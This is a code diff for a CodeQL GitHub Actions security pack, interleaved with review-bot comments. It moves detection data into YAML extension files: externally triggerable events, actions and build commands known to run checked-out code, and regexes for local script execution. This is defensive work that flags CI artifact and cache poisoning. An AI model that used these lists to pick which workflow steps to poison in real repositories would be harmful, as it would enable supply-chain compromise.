manual}/ruby_setup-ruby.model.yml | 0 ...ction-detect-and-tag-new-version.model.yml | 0 .../sergeysova_jq-action.model.yml | 0 ...shallwefootball_upload-s3-action.model.yml | 0 .../shogo82148_actions-setup-perl.model.yml | 0 ...skitionek_notify-microsoft-teams.model.yml | 0 .../snow-actions_eclint.model.yml | 0 .../stackhawk_hawkscan-action.model.yml | 0 .../step-security_harden-runner.model.yml | 0 .../suisei-cn_actions-download-file.model.yml | 0 .../{ => manual}/tibdex_backport.model.yml | 0 .../timheuer_base64-to-file.model.yml | 0 .../tj-actions_branch-names.model.yml | 0 .../trilom_file-changes-action.model.yml | 0 ...ss_conventional-changelog-action.model.yml | 0 .../tryghost_action-deploy-theme.model.yml | 0 .../tzkhan_pr-update-action.model.yml | 0 .../veracode_veracode-sca.model.yml | 0 .../wearerequired_lint-action.model.yml | 0 .../webfactory_ssh-agent.model.yml | 0 .../xt0rted_slash-command-action.model.yml | 0 .../zaproxy_action-baseline.model.yml | 0 .../zaproxy_action-full-scan.model.yml | 0 ql/lib/qlpack.yml | 6 +- ql/test/library-tests/workflowenum.ql | 2 +- 150 files changed, 224 insertions(+), 148 deletions(-) create mode 100644 ql/lib/codeql/actions/config/Config.qll create mode 100644 ql/lib/codeql/actions/config/ConfigExtensions.qll rename ql/lib/ext/{workflow-models/workflow-models.yml => config/context_event_map.yml} (78%) create mode 100644 ql/lib/ext/config/externally_triggereable_events.yml create mode 100644 ql/lib/ext/config/poisonable_steps.yml create mode 100644 ql/lib/ext/config/workflow_runtime_data.yml rename ql/lib/ext/{ => manual}/8398a7_action-slack.model.yml (100%) rename ql/lib/ext/{ => manual}/SonarSource_sonarcloud-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/actions_github-script.model.yml (100%) rename ql/lib/ext/{ => manual}/ahmadnassri_action-changed-files.model.yml (100%) rename ql/lib/ext/{ => manual}/akhileshns_heroku-deploy.model.yml (100%) rename ql/lib/ext/{ => 
manual}/amannn_action-semantic-pull-request.model.yml (100%) rename ql/lib/ext/{ => manual}/anchore_sbom-action.model.yml (100%) rename ql/lib/ext/{ => manual}/anchore_scan-action.model.yml (100%) rename ql/lib/ext/{ => manual}/andresz1_size-limit-action.model.yml (100%) rename ql/lib/ext/{ => manual}/android-actions_setup-android.model.yml (100%) rename ql/lib/ext/{ => manual}/apple-actions_import-codesign-certs.model.yml (100%) rename ql/lib/ext/{ => manual}/asdf-vm_actions.model.yml (100%) rename ql/lib/ext/{ => manual}/ashley-taylor_read-json-property-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ashley-taylor_regex-property-action.model.yml (100%) rename ql/lib/ext/{ => manual}/aszc_change-string-case-action.model.yml (100%) rename ql/lib/ext/{ => manual}/aws-actions_configure-aws-credentials.model.yml (100%) rename ql/lib/ext/{ => manual}/axel-op_googlejavaformat-action.model.yml (100%) rename ql/lib/ext/{ => manual}/azure_powershell.model.yml (100%) rename ql/lib/ext/{ => manual}/bahmutov_npm-install.model.yml (100%) rename ql/lib/ext/{ => manual}/blackducksoftware_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bobheadxi_deployments.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-breaking-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-setup-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cachix_cachix-action.model.yml (100%) rename ql/lib/ext/{ => manual}/changesets_action.model.yml (100%) rename ql/lib/ext/{ => manual}/cloudflare_wrangler-action.model.yml (100%) rename ql/lib/ext/{ => manual}/coursier_cache-action.model.yml (100%) rename ql/lib/ext/{ => manual}/crazy-max_ghaction-chocolatey.model.yml (100%) rename ql/lib/ext/{ => manual}/crazy-max_ghaction-import-gpg.model.yml (100%) rename ql/lib/ext/{ => manual}/csexton_release-asset-action.model.yml (100%) rename ql/lib/ext/{ => 
manual}/cycjimmy_semantic-release-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cypress-io_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/dailydotdev_action-devcard.model.yml (100%) rename ql/lib/ext/{ => manual}/danielpalme_reportgenerator-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/daspn_private-actions-checkout.model.yml (100%) rename ql/lib/ext/{ => manual}/dawidd6_action-ansible-playbook.model.yml (100%) rename ql/lib/ext/{ => manual}/dawidd6_action-download-artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/delaguardo_setup-clojure.model.yml (100%) rename ql/lib/ext/{ => manual}/determinatesystems_magic-nix-cache-action.model.yml (100%) rename ql/lib/ext/{ => manual}/docker-practice_actions-setup-docker.model.yml (100%) rename ql/lib/ext/{ => manual}/docker_build-push-action.model.yml (100%) rename ql/lib/ext/{ => manual}/endbug_latest-tag.model.yml (100%) rename ql/lib/ext/{ => manual}/expo_expo-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/firebaseextended_action-hosting-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/frabert_replace-string-action.model.yml (100%) rename ql/lib/ext/{ => manual}/franzdiebold_github-env-vars-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gabrielbb_xvfb-action.model.yml (100%) rename ql/lib/ext/{ => manual}/game-ci_unity-builder.model.yml (100%) rename ql/lib/ext/{ => manual}/game-ci_unity-test-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/gautamkrishnar_blog-post-workflow.model.yml (100%) rename ql/lib/ext/{ => manual}/getsentry_action-release.model.yml (100%) rename ql/lib/ext/{ => manual}/github_codeql-action.model.yml (100%) rename ql/lib/ext/{ => manual}/go-semantic-release_action.model.yml (100%) rename ql/lib/ext/{ => manual}/golangci_golangci-lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gonuit_heroku-docker-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/goreleaser_goreleaser-action.model.yml (100%) rename 
ql/lib/ext/{ => manual}/gr2m_create-or-update-pull-request-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gradle_gradle-build-action.model.yml (100%) rename ql/lib/ext/{ => manual}/haya14busa_action-cond.model.yml (100%) rename ql/lib/ext/{ => manual}/hexlet_project-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ilammy_msvc-dev-cmd.model.yml (100%) rename ql/lib/ext/{ => manual}/ilammy_setup-nasm.model.yml (100%) rename ql/lib/ext/{ => manual}/imjohnbo_issue-bot.model.yml (100%) rename ql/lib/ext/{ => manual}/iterative_setup-cml.model.yml (100%) rename ql/lib/ext/{ => manual}/iterative_setup-dvc.model.yml (100%) rename ql/lib/ext/{ => manual}/jamesives_github-pages-deploy-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jitterbit_get-changed-files.model.yml (100%) rename ql/lib/ext/{ => manual}/johnnymorganz_stylua-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jsdaniell_create-json.model.yml (100%) rename ql/lib/ext/{ => manual}/jurplel_install-qt-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jwalton_gh-ecr-push.model.yml (100%) rename ql/lib/ext/{ => manual}/khan_pull-request-comment-trigger.model.yml (100%) rename ql/lib/ext/{ => manual}/larsoner_circleci-artifacts-redirector-action.model.yml (100%) rename ql/lib/ext/{ => manual}/leafo_gh-actions-lua.model.yml (100%) rename ql/lib/ext/{ => manual}/leafo_gh-actions-luarocks.model.yml (100%) rename ql/lib/ext/{ => manual}/lucasbento_auto-close-issues.model.yml (100%) rename ql/lib/ext/{ => manual}/mad9000_actions-find-and-replace-string.model.yml (100%) rename ql/lib/ext/{ => manual}/magefile_mage-action.model.yml (100%) rename ql/lib/ext/{ => manual}/maierj_fastlane-action.model.yml (100%) rename ql/lib/ext/{ => manual}/manusa_actions-setup-minikube.model.yml (100%) rename ql/lib/ext/{ => manual}/marocchino_on_artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/mattdavis0351_actions.model.yml (100%) rename ql/lib/ext/{ => manual}/meteorengineer_setup-meteor.model.yml 
(100%) rename ql/lib/ext/{ => manual}/metro-digital_setup-tools-for-waas.model.yml (100%) rename ql/lib/ext/{ => manual}/microsoft_setup-msbuild.model.yml (100%) rename ql/lib/ext/{ => manual}/mishakav_pytest-coverage-comment.model.yml (100%) rename ql/lib/ext/{ => manual}/mr-smithers-excellent_docker-build-push.model.yml (100%) rename ql/lib/ext/{ => manual}/msys2_setup-msys2.model.yml (100%) rename ql/lib/ext/{ => manual}/mxschmitt_action-tmate.model.yml (100%) rename ql/lib/ext/{ => manual}/mymindstorm_setup-emsdk.model.yml (100%) rename ql/lib/ext/{ => manual}/nanasess_setup-chromedriver.model.yml (100%) rename ql/lib/ext/{ => manual}/nanasess_setup-php.model.yml (100%) rename ql/lib/ext/{ => manual}/nick-fields_retry.model.yml (100%) rename ql/lib/ext/{ => manual}/octokit_graphql-action.model.yml (100%) rename ql/lib/ext/{ => manual}/octokit_request-action.model.yml (100%) rename ql/lib/ext/{ => manual}/olafurpg_setup-scala.model.yml (100%) rename ql/lib/ext/{ => manual}/paambaati_codeclimate-action.model.yml (100%) rename ql/lib/ext/{ => manual}/peter-evans_create-pull-request.model.yml (100%) rename ql/lib/ext/{ => manual}/peter-murray_issue-body-parser-action.model.yml (100%) rename ql/lib/ext/{ => manual}/plasmicapp_plasmic-action.model.yml (100%) rename ql/lib/ext/{ => manual}/preactjs_compressed-size-action.model.yml (100%) rename ql/lib/ext/{ => manual}/py-actions_flake8.model.yml (100%) rename ql/lib/ext/{ => manual}/py-actions_py-dependency-install.model.yml (100%) rename ql/lib/ext/{ => manual}/pyo3_maturin-action.model.yml (100%) rename ql/lib/ext/{ => manual}/reactivecircus_android-emulator-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/redhat-plumbers-in-action_download-artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/reggionick_s3-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/renovatebot_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/roots_issue-closer-action.model.yml (100%) rename ql/lib/ext/{ => 
manual}/ros-tooling_setup-ros.model.yml (100%) rename ql/lib/ext/{ => manual}/ruby_setup-ruby.model.yml (100%) rename ql/lib/ext/{ => manual}/salsify_action-detect-and-tag-new-version.model.yml (100%) rename ql/lib/ext/{ => manual}/sergeysova_jq-action.model.yml (100%) rename ql/lib/ext/{ => manual}/shallwefootball_upload-s3-action.model.yml (100%) rename ql/lib/ext/{ => manual}/shogo82148_actions-setup-perl.model.yml (100%) rename ql/lib/ext/{ => manual}/skitionek_notify-microsoft-teams.model.yml (100%) rename ql/lib/ext/{ => manual}/snow-actions_eclint.model.yml (100%) rename ql/lib/ext/{ => manual}/stackhawk_hawkscan-action.model.yml (100%) rename ql/lib/ext/{ => manual}/step-security_harden-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/suisei-cn_actions-download-file.model.yml (100%) rename ql/lib/ext/{ => manual}/tibdex_backport.model.yml (100%) rename ql/lib/ext/{ => manual}/timheuer_base64-to-file.model.yml (100%) rename ql/lib/ext/{ => manual}/tj-actions_branch-names.model.yml (100%) rename ql/lib/ext/{ => manual}/trilom_file-changes-action.model.yml (100%) rename ql/lib/ext/{ => manual}/tripss_conventional-changelog-action.model.yml (100%) rename ql/lib/ext/{ => manual}/tryghost_action-deploy-theme.model.yml (100%) rename ql/lib/ext/{ => manual}/tzkhan_pr-update-action.model.yml (100%) rename ql/lib/ext/{ => manual}/veracode_veracode-sca.model.yml (100%) rename ql/lib/ext/{ => manual}/wearerequired_lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/webfactory_ssh-agent.model.yml (100%) rename ql/lib/ext/{ => manual}/xt0rted_slash-command-action.model.yml (100%) rename ql/lib/ext/{ => manual}/zaproxy_action-baseline.model.yml (100%) rename ql/lib/ext/{ => manual}/zaproxy_action-full-scan.model.yml (100%) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index da54833e9a66..8d965c3e4c71 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -1,7 +1,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Helper -private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.config.Config /** * Gets the length of each line in the StringValue . diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll new file mode 100644 index 000000000000..d6a85c426c68 --- /dev/null +++ b/ql/lib/codeql/actions/config/Config.qll 
@@ -0,0 +1,74 @@
+import ConfigExtensions as Extensions
+
+/**
+ * MaD models for workflow details
+ * Fields:
+ * - path: Path to the workflow file
+ * - trigger: Trigger for the workflow
+ * - job: Job name
+ * - secrets_source: Source of secrets
+ * - permissions: Permissions for the workflow
+ * - runner: Runner info for the workflow
+ */
+predicate workflowDataModel(
+ string path, string trigger, string job, string secrets_source, string permissions, string runner
+) {
+ Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner)
+}
+
+/**
+ * MaD models for repository details
+ * Fields:
+ * - visibility: Visibility of the repository
+ * - default_branch_name: Default branch name
+ */
+predicate repositoryDataModel(string visibility, string default_branch_name) {
+ Extensions::repositoryDataModel(visibility, default_branch_name)
+}
+
+/**
+ * MaD models for context/trigger mapping
+ * Fields:
+ * - trigger: Trigger for the workflow
+ * - context_prefix: Prefix for the context
+ */
+predicate contextTriggerDataModel(string trigger, string context_prefix) {
+ Extensions::contextTriggerDataModel(trigger, context_prefix)
+}
+
+/**
+ * MaD models for externally triggerable events
+ * Fields:
+ * - event: Event name
+ */
+predicate externallyTriggerableEventsDataModel(string event) {
+ Extensions::externallyTriggerableEventsDataModel(event)
+}
+
+/**
+ * MaD models for poisonable commands
+ * Fields:
+ * - regexp: Regular expression for matching poisonable commands
+ */
+predicate poisonableCommandsDataModel(string regexp) {
+ Extensions::poisonableCommandsDataModel(regexp)
+}
+
+/**
+ * MaD models for poisonable local scripts
+ * Fields:
+ * - regexp: Regular expression for matching poisonable local scripts
+ * - group: Script capture group number for the regular expression
+ */
+predicate poisonableLocalScriptsDataModel(string regexp, int group) {
+ Extensions::poisonableLocalScriptsDataModel(regexp, group)
+}
+
+/**
+ * MaD models for poisonable actions
+ * Fields:
+ * - action: action name
+ */
+predicate poisonableActionsDataModel(string action) {
+ Extensions::poisonableActionsDataModel(action)
+}
diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll
new file mode 100644
index 000000000000..3ca4b6a75593
--- /dev/null
+++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll
@@ -0,0 +1,41 @@
+/**
+ * This module provides extensible predicates for defining MaD models.
+ */
+
+/**
+ * Holds if workflow data model exists for the given parameters.
+ */
+extensible predicate workflowDataModel(
+ string path, string trigger, string job, string secrets_source, string permissions, string runner
+);
+
+/**
+ * Holds if repository data model exists for the given parameters.
+ */
+extensible predicate repositoryDataModel(string visibility, string default_branch_name);
+
+/**
+ * Holds if a context expression starting with context_prefix is available for a given trigger.
+ */
+extensible predicate contextTriggerDataModel(string trigger, string context_prefix);
+
+/**
+ * Holds if a given trigger event can be fired by an external actor.
+ */
+extensible predicate externallyTriggerableEventsDataModel(string event);
+
+/**
+ * Holds for strings that match poisonable commands.
+ */
+extensible predicate poisonableCommandsDataModel(string regexp);
+
+/**
+ * Holds for strings that match poisonable local scripts.
+ */
+extensible predicate poisonableLocalScriptsDataModel(string regexp, int group);
+
+/**
+ * Holds for actions that can be poisoned through local files.
+ */
+extensible predicate poisonableActionsDataModel(string action);
+
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index d0b84f918d59..2cb8c56b147f 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
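Review bot: The `- job: Job name` field description of workflowDataModel is ambiguous in a way that matters: JobImpl.hasRuntimeData in patch 343 compares this column against the job id (`getId()`) with a prefix `matches`, so a row keyed by a job's display `name:` would never match, while a row for a job whose id is a prefix of another's would match both. Document the key precisely, e.g. `- job: Job id (the key under jobs:), compared against the job id as a prefix`, and add a sentence that a row for a job switches off the "normally privileged trigger" heuristic in isPrivilegedExternallyTriggerable, so a stale or mis-keyed row in the backing data extension (workflow_runtime_data.yml in the diffstat) hides findings rather than adding them. The same description is repeated on the extensible predicate in ConfigExtensions.qll in the next hunk and should be corrected there too.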
@@ -2,51 +2,6 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions -/** - * MaD models for workflow details - * Fields: - * - path: Path to the workflow file - * - trigger: Trigger for the workflow - * - job: Job name - * - secrets_source: Source of secrets - * - permissions: Permissions for the workflow - * - runner: Runner info for the workflow - */ -predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, string runner -) { - Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) -} - -/** - * MaD models for repository details - * Fields: - * - visibility: Visibility of the repository - * - default_branch_name: Default branch name - */ -predicate repositoryDataModel(string visibility, string default_branch_name) { - Extensions::repositoryDataModel(visibility, default_branch_name) -} - -/** - * MaD models for context/trigger mapping - * Fields: - * - trigger: Trigger for the workflow - * - context_prefix: Prefix for the context - */ -predicate contextTriggerDataModel(string trigger, string context_prefix) { - Extensions::contextTriggerDataModel(trigger, context_prefix) -} - -/** - * MaD models for externally triggerable events - * Fields: - * - event: Event name - */ -predicate externallyTriggerableEventsDataModel(string event) { - Extensions::externallyTriggerableEventsDataModel(event) -} - /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 7217796d138b..b09664359abc 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -1,5 +1,6 @@ -private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.config.Config +private import codeql.actions.dataflow.ExternalFlow /** * A data flow source. diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 05f71cfc0be6..bd9d73b41703 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -22,25 +22,3 @@ extensible predicate actionsSummaryModel( extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); - -/** - * Holds if workflow data model exists for the given parameters. - */ -extensible predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, string runner -); - -/** - * Holds if repository data model exists for the given parameters. - */ -extensible predicate repositoryDataModel(string visibility, string default_branch_name); - -/** - * Holds if a context expression starting with context_prefix is available for a given trigger. - */ -extensible predicate contextTriggerDataModel(string trigger, string context_prefix); - -/** - * Holds if a given trigger event can be fired by an external actor. - */ -extensible predicate externallyTriggerableEventsDataModel(string event); diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 44c3c64a5a69..d2853591d61e 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -254,8 +254,8 @@ class ArtifactPoisoningSink extends DataFlow::Node { poisonable.(UsesStep) = this.asExpr() ) and ( - not poisonable instanceof LocalCommandExecutionRunStep or - poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath() + "%") + not poisonable instanceof LocalScriptExecutionRunStep or + poisonable.(LocalScriptExecutionRunStep).getCommand().matches(download.getPath() + "%") ) ) } diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index e80ea71c958a..1a3e7b2b2f7c 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.config.Config string defaultBranchTriggerEvent() { result = diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index b1d5269d44a3..d9978b2a4239 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -1,67 +1,35 @@ import actions +import codeql.actions.config.Config abstract class PoisonableStep extends Step { } -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { - result = - [ - "pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", - "ruby/setup-ruby", "actions/jekyll-build-pages" - ] + exists(string action | + poisonableActionsDataModel(action) and + result = action + ) } class DangerousActionUsesStep extends PoisonableStep, UsesStep { DangerousActionUsesStep() { this.getCallee() = dangerousActions() } } -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 -private string dangerousCommands() { - result = - [ - "npm i(nstall)?(\\b|$)", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", - "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", - "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", - "poetry run", "cargo " - ] -} - -class BuildRunStep extends PoisonableStep, Run { - BuildRunStep() { - exists( - this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) +class PoisonableCommandStep extends PoisonableStep, Run { + PoisonableCommandStep() { + exists(string regexp | + poisonableCommandsDataModel(regexp) and + exists(this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + regexp, _, _)) ) } } -bindingset[cmdRegexp] -string wrapLocalCmd(string cmdRegexp) { result = "(^|;\\s*|\\s+)" + cmdRegexp + "(\\s+|;|$)" } - -class LocalCommandExecutionRunStep extends PoisonableStep, Run { +class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; - LocalCommandExecutionRunStep() { - // Heuristic: - exists(string line | line = 
this.getScript().splitAt("\n").trim() | - // ./xxxx - // TODO: It could also be in the form of `dir/cmd` - cmd = line.regexpCapture(wrapLocalCmd("\\.\\/(.*)"), 2) - or - // sh xxxx - cmd = line.regexpCapture(wrapLocalCmd("(ba|z|fi)?sh\\s+(.*)"), 3) - or - // node xxxx.js - cmd = line.regexpCapture(wrapLocalCmd("node\\s+(.*)(\\.js|\\.ts)"), 2) - or - // python xxxx.py - cmd = line.regexpCapture(wrapLocalCmd("python\\s+(.*)\\.py"), 2) - or - // ruby xxxx.rb - cmd = line.regexpCapture(wrapLocalCmd("ruby\\s+(.*)\\.rb"), 2) - or - // go xxxx.go - cmd = line.regexpCapture(wrapLocalCmd("go\\s+(.*)\\.go"), 2) + LocalScriptExecutionRunStep() { + exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | + poisonableLocalScriptsDataModel(regexp, group) and + cmd = line.regexpCapture(regexp, group) ) } diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 03b6c87405e7..419b2ac81a97 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.config.Config bindingset[runner] predicate isGithubHostedRunner(string runner) { diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/config/context_event_map.yml similarity index 78% rename from ql/lib/ext/workflow-models/workflow-models.yml rename to ql/lib/ext/config/context_event_map.yml index 1f0401e8e616..e09dab14f2b8 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -1,12 +1,4 @@ extensions: - - addsTo: - pack: github/actions-all - extensible: repositoryDataModel - data: [] - - addsTo: - pack: github/actions-all - extensible: workflowDataModel - data: [] - addsTo: pack: github/actions-all extensible: contextTriggerDataModel 
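Review bot: `LocalScriptExecutionRunStep` now trusts `group` from the data row unconditionally; as far as I can tell, a row whose `group` exceeds the capture groups in its `regexp` just makes `regexpCapture` not hold, so that pattern is silently dropped rather than reported, and a comment stating the contract would help the next pack author: `// regexp must match the whole trimmed line; group is the 1-based capture group holding the script path`. `dangerousActions()` can be reduced to `private string dangerousActions() { poisonableActionsDataModel(result) }`, since the `exists` adds nothing. The `([^a-z]|^)` prefix in `PoisonableCommandStep` is now the only anchoring the command patterns get, so any entry that relied on its own `^` (the removed list had `"^ant "`) must carry it in the data row. The body of `LocalScriptExecutionRunStep` continues outside the hunk.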
@@ -54,19 +46,4 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] - - addsTo: - pack: github/actions-all - extensible: externallyTriggerableEventsDataModel - data: - - ["discussion"] - - ["discussion_comment"] - - ["fork"] - - ["issue_comment"] - - ["issues"] - - ["pull_request"] - - ["pull_request_comment"] - - ["pull_request_review"] - - ["pull_request_review_comment"] - - ["pull_request_target"] - - ["workflow_run"] # depending on trigger workflow - - ["workflow_call"] # depending on caller + diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml new file mode 100644 index 000000000000..88d17c728b75 --- /dev/null +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: externallyTriggerableEventsDataModel + data: + - ["discussion"] + - ["discussion_comment"] + - ["fork"] + - ["issue_comment"] + - ["issues"] + - ["pull_request"] + - ["pull_request_comment"] + - ["pull_request_review"] + - ["pull_request_review_comment"] + - ["pull_request_target"] + - ["workflow_run"] # depending on trigger workflow + - ["workflow_call"] # depending on caller + diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml new file mode 100644 index 000000000000..9a9af08872c8 --- /dev/null +++ b/ql/lib/ext/config/poisonable_steps.yml 
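Review bot: The new file name is misspelled (`externally_triggereable_events.yml`); since this directory is now the config extension point, I would rename it to `externally_triggerable_events.yml` before other packs start referencing it. On the contents, `pull_request_comment` is not, as far as I know, a GitHub Actions trigger name — comments on pull requests arrive through `issue_comment` (already listed) and `pull_request_review_comment` — so that row likely never matches a workflow. Conversely `watch` (a star on the repository) can be raised by any GitHub user and is missing; I would add `- ["watch"]`. A one-line comment defining "externally triggerable" (an actor without write access can fire the event) would make future additions easier to judge.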
@@ -0,0 +1,55 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: poisonableActionsDataModel
+ # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16
+ # source: https://boostsecurityio.github.io/lotp/
+ data:
+ - ["pre-commit/action"]
+ - ["oxsecurity/megalinter"]
+ - ["bridgecrewio/checkov-action"]
+ - ["ruby/setup-ruby"]
+ - ["actions/jekyll-build-pages"]
+ - addsTo:
+ pack: github/actions-all
+ extensible: poisonableCommandsDataModel
+ # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23
+ # source: https://boostsecurityio.github.io/lotp/
+ data:
+ - ["ant "]
+ - ["bundle install"]
+ - ["bundle exec "]
+ - ["cargo "]
+ - ["go generate"]
+ - ["gomplate "]
+ - ["gradle "]
+ - ["java -jar "]
+ - ["make "]
+ - ["mkdocs build"]
+ - ["msbuild "]
+ - ["mvn "]
+ - ["npm i(nstall)?(\\b|$)"]
+ - ["npm run "]
+ - ["npm ci(\\b|$)"]
+ - ["pip install -r "]
+ - ["pip install --requirement"]
+ - ["poetry install"]
+ - ["poetry run"]
+ - ["pre-commit run"]
+ - ["pre-commit install"]
+ - ["pytest"]
+ - ["terraform plan"]
+ - ["terraform apply"]
+ - ["yarn "]
+ - addsTo:
+ pack: github/actions-all
+ extensible: poisonableLocalScriptsDataModel
+ data:
+ # TODO: It could also be in the form of `dir/cmd`
+ - ["(^|;\\s*|\\s+)(\\.\\/)(.*)(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(python)\\s+(.*)\\.py(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(go)\\s+(.*)\\.go(\\s+|;|$)", 3]
+
diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/ql/lib/ext/config/workflow_runtime_data.yml
new file mode 100644
index 000000000000..88e266d8142a
--- /dev/null
+++ b/ql/lib/ext/config/workflow_runtime_data.yml
